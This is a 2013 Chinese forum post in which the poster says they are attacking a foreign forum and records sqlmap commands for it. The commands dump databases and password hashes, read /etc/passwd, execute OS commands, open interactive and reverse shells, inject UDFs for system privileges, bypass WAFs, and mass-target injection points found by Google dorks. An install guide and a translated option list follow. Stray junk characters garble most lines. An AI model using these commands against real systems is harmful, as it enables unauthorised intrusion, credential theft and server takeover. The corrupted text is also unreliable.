今天搞国外的一个论坛。发现萝卜和穿山甲都无法正常注入,实在没办法了 还是临时学习了下国外的神器sqlmap的使用方法,,直接做个记录、、
' ?; b# D2 Y8 Zsqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1″ –current-db #获取当前数 据库名称
6 D$ ]* f7 J8 O0 h% jsqlmap -u “http://www.xxoo.com/news?id=1″ –tables -D “db_name”#列 表名! M; ?7 [4 ]) ]4 j" c9 ]
sqlmap -u “http://url/news?id=1″ –columns -T “tablename”users-D “db_name”-v 0 #列字段
; [% C7 V0 d' \: X
. A* b" Y: d0 @8 V csqlmap -u “http://url/news?id=1″ –dump -C “column_name” -T “table_name”-D “db_name”-v
2 a9 \5 ]- [+ n7 a' F. O4 _( z0 #获取字段内容* a( o" \; [: y7 m
: n2 f) n$ _* I3 _+ r; R
******************信息获取******************
! @( r; e! T0 Psqlmap -u “http://url/news?id=1″ –dbms “Mysql” –users # dbms 指定数 据库类型7 k* r, h( `- e# h& z4 d) O3 g6 x
sqlmap -u “http://url/news?id=1″ –users #列数据库用户* A; g* a) K% W& P, z4 `
sqlmap -u “http://url/news?id=1″ –dbs#列数据库4 \/ l# D& E# \9 E
sqlmap -u “http://url/news?id=1″ –passwords #数据库用户密码
' h \' n: h% K' Y W- Isqlmap -u “http://url/news?id=1″ –passwords-U root -v 0 #列出指定用户 数据库密码
* C3 i8 D; I0 [' O* T1 msqlmap -u “http://url/news?id=1″ –dump -C “password,user,id” -T “tablename”-D “db_name”
& c i9 O$ f0 Z–start 1 –stop 20 #列出指定字段,列出20 条
9 \# X! T' k2 ?3 v% }- y. I+ G: o6 V9 ]sqlmap -u “http://url/news?id=1″ –dump-all -v 0 #列出所有数据库所有表7 E9 d( E( f/ x9 E4 k3 K8 B0 d2 s8 {
sqlmap -u “http://url/news?id=1″ –privileges #查看权限
! J; U8 V1 z: _sqlmap -u “http://url/news?id=1″ –privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色7 @7 t" B" _( h- t8 G
sqlmap -u “http://url/news?id=1″ –udf-inject #导入用户自定义函数(获取 系统权限!)4 X" `7 b7 ?9 w0 V
sqlmap -u “http://url/news?id=1″ –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表0 m% R2 b/ g# @4 d5 T1 [1 k* s2 d
sqlmap -u “http://url/news?id=1″ –union-cols #union 查询表记录) p, M- d! k3 i
sqlmap -u “http://url/news?id=1″ –cookie “COOKIE_VALUE”#cookie注入
, g! _0 \2 b/ y' U5 \6 c. C) Ksqlmap -u “http://url/news?id=1″-b #获取banner信息
4 q: X7 S/ _6 U4 n1 d0 z6 g& nsqlmap -u “http://url/news?id=1″ –data “id=3″#post注入6 F1 P q' l$ {: y7 `$ \9 ]+ [
sqlmap -u “http://url/news?id=1″-v 1 -f #指纹判别数据库类型
5 p! i2 Y" Q! `: ~sqlmap -u “http://url/news?id=1″ –proxy“http://127.0.0.1:8118” #代理注 入2 b/ |- G* N& l# H v1 u
sqlmap -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE”# 指 定关键词
+ i6 {5 _1 E7 J" x* ^2 qsqlmap -u “http://url/news?id=1″ –sql-shell #执行指定sql命令
5 f% B/ k7 u* psqlmap -u “http://url/news?id=1″ –file /etc/passwd
: G4 }5 q& k; l# |' k" j, Msqlmap -u “http://url/news?id=1″ –os-cmd=whoami #执行系统命令
; K& i, u! l _: m" E* Jsqlmap -u “http://url/news?id=1″ –os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell. f/ G* a6 F* \5 r* E
sqlmap -u “http://url/news?id=1″ –reg-read #读取win系统注册表! j% Y6 c5 }# W5 P% b) {& @
sqlmap -u “http://url/news?id=1″ –dbs-o “sqlmap.log”#保存进度$ `3 r% H+ V% `/ t% S8 z. K0 k
sqlmap -u “http://url/news?id=1″ –dbs -o “sqlmap.log” –resume #恢复 已保存进度: u- P3 x$ a# q D' ?# I; R* _
***********高级用法*************
( \0 D; |" K u) _# G' [-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入- q- Y! c) L) e
sqlmap -g “google语法” –dump-all –batch #google搜索注入点自动 跑出 所有字段 需保证google.com能正常访问
! |; e; S! V3 h% V0 [ G z–technique 测试指定注入类型\使用的技术7 P6 u" o) b4 |
不加参数默认测试所有注入技术7 i5 J5 C! b! n( X1 E0 g7 f
• B: 基于布尔的SQL 盲注$ B) c' D- Y1 P3 y; E
• E: 基于显错sql 注入9 Z+ I1 x4 t- i5 l& ]5 s- G+ ?
• U: 基于UNION 注入
0 {3 W! n$ M( z# `. n& X% f( y( H• S: 叠层sql 注入
) H1 f- A% O8 I. H• T: 基于时间盲注
( y4 b" E S' b' g: x–tamper 通过编码绕过WEB 防火墙(WAF)Sqlmap 默认用char(). {5 F( o+ K; G, U, B0 x
–tamper 插件所在目录* c' _" D" T' O7 g0 p9 r8 A/ q! z
\sqlmap-dev\tamper. Q K y8 |2 k( w
sqlmap -u “http:// www.2cto.com /news?id=1″ –smart –level 3 –users # smart 智 能
% X4 a5 _- ]/ x' B7 A0 `* Olevel 执行测试等级 攻击实例:
6 l4 q1 r" B( `+ T! _* SSqlmap -u “http://url/news?id=1&Submit=Submit”5 N* b6 Q* {6 g1 j4 I
–cookie=”PHPSESSID=41aa833e6d0d5 C4 s" Z6 q% w/ n" v/ t
28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –user8 t4 P6 x. z1 T' a$ |
–password
% y+ W: l! U8 n* M( n* v; _参考文档:http://sqlmap.sourceforge.net/doc/README.html
c4 ~$ [0 u' h6 c' v***********安装最新版本*************
; f7 e& b8 O8 Rubuntu 通过apt-get install 安装的sqlmap版本为0.6 我们通过svn 来安装 为 最新1.0版
# u' |6 F+ l2 N6 k1 s5 z# L8 usudo svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
/ O, u2 g6 a4 q! p安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py 直接执行/home/当前用户/sqlmap-dev/sqlmap.py –version 这样很不方便 我们可以设置.bashrc 文件/ I/ w6 M/ B4 I
sudo vim /home/当前用户/.bashrc
6 z' P O) |, B3 K' C: F) c#任意位置加上:) f) A( }2 K' R0 R6 z7 b
alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 该环境变量只对当前用户有效6 V( y+ L H: q( R
如果想对所有用户有效 可设置全局 编辑下面的文件 Z: j1 u) j% S! ~) W* ~
vim /etc/profile
9 r1 Z( \2 u( C5 ^% k同样加上:1 E6 x( v8 J% T! m( m4 r9 D, b8 q( g
alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 重启生效
0 }) f+ n& j; q; T% O******************windows 7 (x64) sqlmap install (SVN)************& ^, z8 ~0 k+ O; Q1 }# G( R
http://www.python.org/getit/ 安装python
7 S0 U- `- v$ Z6 |http://www.sliksvn.com/en/download 安装windows svn client
' [" ]; n' d* ^" m4 fsvn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
: V" u/ U( I9 f9 u! e安装sqlmap0 e* l7 K. F k+ {" \
*修改环境变量6 f+ E o# _; H, j7 |+ l
–version 显示程序的版本号并退出
! i4 J; o, L, |9 V3 x5 ~: U-h, –help 显示此帮助消息并退出
7 O: O$ [8 c9 Q-v VERBOSE 详细级别:0-6(默认为1)- u* c! s9 C ] x( v+ b" s
Target(目标): 以下至少需要设置其中一个选项,设置目标URL。
6 G, @3 D$ T* T9 {-d DIRECT 直接连接到数据库。, M3 x: i1 p7 |/ N* j
-u URL, –url=URL 目标URL。7 i: f# I4 j; |" S( i- x, g) B
-l LIST 从Burp 或WebScarab 代理的日志中解析目标。$ |, @- T2 R2 [% T. F9 n' B0 P. R
-r REQUESTFILE 从一个文件中载入HTTP 请求。
# q* E& F8 e" A( l: H R& M-g GOOGLEDORK 处理Google dork 的结果作为目标URL。: x3 q( w2 q: m; M0 b
-c CONFIGFILE 从INI 配置文件中加载选项。
+ m1 u2 m# h a* JRequest(请求)::
& v& p0 o) M8 I8 R' I这些选项可以用来指定如何连接到目标URL。% o! I5 X" U6 F V% n, J& K
–data=DATA 通过POST 发送的数据字符串0 X0 T% M' O: D* ?8 F' M
–cookie=COOKIE HTTP Cookie 头# E: n+ Y* x5 c' s
–cookie-urlencode URL 编码生成的cookie 注入8 W ^7 D9 P4 e$ t; u, l; O' m
–drop-set-cookie 忽略响应的Set –Cookie 头信息6 [$ e* f' ?4 k9 m, O
0 G4 z. _1 \# Z. }1 g5 E/ f3 J4 j–user-agent=AGENT 指定 HTTP User –Agent 头$ U# {% X% H/ x! a' ~ L, |% |
–random-agent 使用随机选定的HTTP User –Agent 头8 C. p( Z! J( f9 q8 f6 c) L
–referer=REFERER 指定 HTTP Referer 头. k6 K3 L9 I2 `7 [
–headers=HEADERS 换行分开,加入其他的HTTP 头( R1 c5 f" p" z+ A, e8 h
–auth-type=ATYPE HTTP 身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)
, q% k- A; } e6 `$ R6 ^1 m–auth-cred=ACRED HTTP 身份验证凭据(用户名:密码)7 B9 n' b; q4 d- V& N
–auth-cert=ACERT HTTP 认证证书(key_file,cert_file)
9 z M2 E; k/ [/ Y8 ?4 Z–proxy=PROXY 使用HTTP 代理连接到目标URL& Q% C, E3 p7 z" ?0 R7 |4 n# \3 K1 Y: ?
–proxy-cred=PCRED HTTP 代理身份验证凭据(用户名:密码)
+ w8 g P/ R- t- I1 l- f3 U–ignore-proxy 忽略系统默认的HTTP 代理
) |' c7 b5 o- s. t–delay=DELAY 在每个HTTP 请求之间的延迟时间,单位为秒
7 Y5 }6 l _9 B' p4 V–timeout=TIMEOUT 等待连接超时的时间(默认为30 秒)- n( b0 @! X* }' r
–retries=RETRIES 连接超时后重新连接的时间(默认3). t6 K3 v" T$ ^6 y' G
–scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式
9 U, i1 E$ ]. C2 W5 X6 E. a" {–safe-url=SAFURL 在测试过程中经常访问的url 地址
, k( o4 D0 |+ g0 n" D* x7 r–safe-freq=SAFREQ 两次访问之间测试请求,给出安全的URL6 k- I S' g* P1 [: T
Optimization(优化): 这些选项可用于优化SqlMap 的性能。4 q, x; P ~- X
-o 开启所有优化开关 c7 w1 e0 `) s8 p/ B/ [( s
–predict-output 预测常见的查询输出( \) S5 T3 u2 ^+ v
–keep-alive 使用持久的HTTP(S)连接; X) `, A8 w4 z9 t! q+ _2 ]5 {
–null-connection 从没有实际的HTTP 响应体中检索页面长度
$ a3 N. h4 l% R0 j–threads=THREADS 最大的HTTP(S)请求并发量(默认为1)8 O+ ^- x, r3 ~+ g
Injection(注入):
7 k/ Q$ L( L9 S这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads 和可选篡改脚本。
/ Z5 f& T& _3 e' T3 ^& A# h-p TESTPARAMETER 可测试的参数(S)
6 N$ ^# h& L( r. K! @! V–dbms=DBMS 强制后端的DBMS 为此值, y2 z: }# w7 P5 C
–os=OS 强制后端的DBMS 操作系统为这个值, M* T: p7 O9 |! `8 @
–prefix=PREFIX 注入payload 字符串前缀
' ]2 t2 V' I! a6 d0 T4 t–suffix=SUFFIX 注入 payload 字符串后缀, Y l2 ?, p* O, W. V6 ?5 T
–tamper=TAMPER 使用给定的脚本(S)篡改注入数据
2 |% ~# m6 Y0 N3 oDetection(检测):
5 e$ R/ k- @3 `+ y3 h/ n: x @这些选项可以用来指定在SQL 盲注时如何解析和比较HTTP 响应页面的内容。
- a9 P4 E9 R( s& ^# U–level=LEVEL 执行测试的等级(1-5,默认为1)
4 L0 m7 O* P1 E) k, m–risk=RISK 执行测试的风险(0-3,默认为1)' E& |% f, i" U, ?2 F9 a
–string=STRING 查询时有效时在页面匹配字符串# k7 }- \+ o, o. O$ w$ k# x
–regexp=REGEXP 查询时有效时在页面匹配正则表达式
$ x8 T' @2 d* |–text-only 仅基于在文本内容比较网页) _: C. e+ ]" W2 [; t8 M7 i
Techniques(技巧): 这些选项可用于调整具体的SQL 注入测试。& J8 ]' i/ \1 e; ^" u+ I9 I8 h- j
–technique=TECH SQL 注入技术测试(默认BEUST)
0 i0 b+ `1 [: x+ j# {–time-sec=TIMESEC DBMS 响应的延迟时间(默认为5 秒)
* I; J% m6 D, w–union-cols=UCOLS 定列范围用于测试UNION 查询注入- g# z k" V5 m9 j) H2 l, \. N
–union-char=UCHAR 用于暴力猜解列数的字符
! ]' u( y& i0 [( `8 WFingerprint(指纹):, S2 e: e" l" F+ g4 A* E, G& t; X2 T
-f, –fingerprint 执行检查广泛的DBMS 版本指纹
( |: ]# K6 r1 ^ e# w- |1 GEnumeration(枚举):
& {$ o3 e; c, V
! K7 A, C7 H! l) [2 p这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己 的SQL 语句。* K/ J/ ?! N0 D! K* `/ @
-b, –banner 检索数据库管理系统的标识" L$ V2 T$ e5 j: g. z: j4 L+ I
–current-user 检索数据库管理系统当前用户% s+ _& K4 ]: ?# J) ^9 j! ?3 i& h* l! M
–current-db 检索数据库管理系统当前数据库% s6 I {7 e+ [ O, N8 ?
–is-dba 检测DBMS 当前用户是否DBA& }6 q. z, B) D
–users 枚举数据库管理系统用户
2 I S) U( f* b) n' y–passwords 枚举数据库管理系统用户密码哈希1 o5 P. \ O1 c0 v
–privileges 枚举数据库管理系统用户的权限
$ v4 i' p/ G8 a; V–roles 枚举数据库管理系统用户的角色6 K7 B. ]$ s! y5 W4 P* W5 m2 G7 w
–dbs 枚举数据库管理系统数据库4 B* i4 O4 L! X' v# e! e
–tables 枚举的DBMS 数据库中的表
* u* ?1 C8 b3 P( T–columns 枚举DBMS 数据库表列2 b+ l( j, v1 t- b9 E" o+ Q! [, k
–dump 转储数据库管理系统的数据库中的表项0 f. T% n" b) P- ~; ^ \) j
–dump-all 转储所有的DBMS 数据库表中的条目5 u+ u0 p% @1 h' \+ j" N8 h* I0 p
–search 搜索列(S),表(S)和/或数据库名称(S)+ O, c# \' b$ P5 v3 t
-D DB 要进行枚举的数据库名
! d4 E% f$ e3 s4 v. w-T TBL 要进行枚举的数据库表
7 S7 ~- h& ?- d2 n-C COL 要进行枚举的数据库列. X3 X" E# i* |$ h1 i
-U USER 用来进行枚举的数据库用户
, b% Y# H; a; U. J8 n1 A) L5 I–exclude-sysdbs 枚举表时排除系统数据库, [5 \' U# H1 [! n& S5 S
–start=LIMITSTART 第一个查询输出进入检索
, S: ?- B2 i6 ?, {' z) J–stop=LIMITSTOP 最后查询的输出进入检索5 J, S% i) m9 X* j% `: C4 D1 L
–first=FIRSTCHAR 第一个查询输出字的字符检索
7 [- X% L5 g# ^1 _8 ]1 I–last=LASTCHAR 最后查询的输出字字符检索
( Y) F& u4 B O# I! t–sql-query=QUERY 要执行的SQL 语句' ^1 ~4 M( K! w$ f' D
–sql-shell 提示交互式SQL 的shell! U4 m: U& c9 V m: i
Brute force(蛮力): 这些选项可以被用来运行蛮力检查。
/ l% U# `; C. G% _; k4 }, r$ j4 C& J# U! A–common-tables 检查存在共同表. L; S3 W6 v Z L- Q% a+ r. R
–common-columns 检查存在共同列/ L" J7 ?7 R. _. w# m
User-defined function injection(用户自定义函数注入): 这些选项可以用来创建用户自定义函数。
# c% {( P1 C1 W$ D–udf-inject 注入用户自定义函数! v; f% x* @1 s s0 o
–shared-lib=SHLIB 共享库的本地路径+ B+ o* M- P8 ]3 i) n
File system access(访问文件系统): 这些选项可以被用来访问后端数据库管理系统的底层文件系统。
9 q9 L* U& t- a7 V' \–file-read=RFILE 从后端的数据库管理系统文件系统读取文件( [9 Z- F9 L. D7 i. u4 S7 \! L
–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
+ J& N U) }/ G7 I& o- t* Z' g& p5 j# p–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
+ C( P* h1 P1 hOperating system access(操作系统访问): 这些选项可以用于访问后端数据库管理系统的底层操作系统。
& q6 T0 q( M% C7 n' o: d. S–os-cmd=OSCMD 执行操作系统命令
$ D# h8 m9 q$ u" d, ]–os-shell 交互式的操作系统的shell
3 Z& X2 S2 m, j7 g1 Q7 h–os-pwn 获取一个OOB shell,meterpreter 或VNC
" w5 t; L9 q! i, u/ Q3 \–os-smbrelay 一键获取一个OOB shell,meterpreter 或VNC% W' i# T7 g& {
–os-bof 存储过程缓冲区溢出利用
1 n3 K C$ ]7 [5 L2 O$ n4 r; P9 [–priv-esc 数据库进程用户权限提升( \) \) r& p7 s7 z& o8 F, P
–msf-path=MSFPATH Metasploit Framework 本地的安装路径' g; W/ H+ h3 I4 ~) p
–tmp-path=TMPPATH 远程临时文件目录的绝对路径! U% E( @! q7 E, l
, u$ m3 }% X, |) ^! NWindows 注册表访问: 这些选项可以被用来访问后端数据库管理系统Windows 注册表。
% F7 p1 Q0 O }& M3 ]; m' N6 |% p–reg-read 读一个Windows 注册表项值7 r6 `) y2 W/ A& F
–reg-add 写一个Windows 注册表项值数据
" W7 K$ N- c: H! \ A7 Z1 d9 G–reg-del 删除Windows 注册表键值- Y0 J# W+ i/ p, U/ \1 y
–reg-key=REGKEY Windows 注册表键$ q# n2 W% B! @$ J; O
–reg-value=REGVAL Windows 注册表项值 Q& E. \1 q* _6 M3 Z/ i
–reg-data=REGDATA Windows 注册表键值数据
6 v, n6 K; j, E0 C- S& h) H3 |8 N9 e–reg-type=REGTYPE Windows 注册表项值类型3 B" Q- B6 y3 y" h0 m( L
General(一般): 这些选项可以用来设置一些一般的工作参数。3 w* U( L3 w# v E% n# t7 i M
-t TRAFFICFILE 记录所有HTTP 流量到一个文本文件中
8 z$ j; \8 w2 K-s SESSIONFILE 保存和恢复检索会话文件的所有数据
2 ~5 l' X( k! S5 a–flush-session 刷新当前目标的会话文件
" l+ a7 [) s! ]3 x }–fresh-queries 忽略在会话文件中存储的查询结果
0 Z/ C+ [/ i0 @; h2 A7 D+ r+ n–eta 显示每个输出的预计到达时间
# r8 c. y' V/ f0 n–update 更新SqlMap; W7 f/ T0 C+ Q2 F2 w' ]
–save file 保存选项到INI 配置文件
* s; R- j4 G3 |. X2 r8 }–batch 从不询问用户输入,使用所有默认配置。
2 P- N U0 I3 ~& k1 e3 T3 K2 lMiscellaneous(杂项):+ f. C" ~' @" u
–beep 发现SQL 注入时提醒% Z) x% {: f3 r
–check-payload IDS 对注入payloads 的检测测试
* a( i) g2 [3 G$ f5 g8 N$ }–cleanup SqlMap 具体的UDF 和表清理DBMS
* i! E7 h/ e9 b+ w7 t–forms 对目标URL 的解析和测试形式
) G" U( ]* D5 J7 ^, u6 |7 d–gpage=GOOGLEPAGE 从指定的页码使用谷歌dork 结果
0 t: n' d5 F$ z3 @; i0 {–page-rank Google dork 结果显示网页排名(PR)% n# x# M" i% r1 h2 y
–parse-errors 从响应页面解析数据库管理系统的错误消息5 R( R+ d+ d0 Z% C! q
–replicate 复制转储的数据到一个sqlite3 数据库. }$ j j( [5 o- Q3 c2 V* M/ X/ L; T
–tor 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址
& M/ |4 G* x+ }& z6 j9 j–wizard 给初级用户的简单向导界面 |
发表于 2013-4-4 22:26:32
收藏
支持
反对